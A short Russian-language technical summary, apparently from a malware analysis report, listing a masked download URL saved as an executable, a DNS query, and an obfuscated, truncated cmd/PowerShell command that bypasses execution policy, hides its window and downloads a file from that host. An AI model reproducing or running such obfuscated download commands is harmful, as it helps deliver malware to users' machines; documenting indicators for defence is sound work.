Техническая информация
- http://to###ores.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^ow^e^rS^H^ELl.^E^XE -Exe^Cuti^onPo^L^icy^ ^BYP^a^sS -n^oP^rofil^e^ -Win^dOWsT^Y^L^e^ ^HiDD^eN (neW-o^bJe^CT ^Sys^t^EM.NET.Webc^lI^e^nt^).D^O^WNL^O^aDF^i^L^e(^'http://to###...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "p^ow^e^rS^H^ELl.^E^XE -Exe^Cuti^onPo^L^icy^ ^BYP^a^sS -n^oP^rofil^e^ -Win^dOWsT^Y^L^e^ ^HiDD^eN (neW-o^bJe^CT ^Sys^t^EM.NET.Webc^lI^e^nt^).D^O^WNL^O^aDF^i^L^e(^'http://to###...' (со скрытым окном)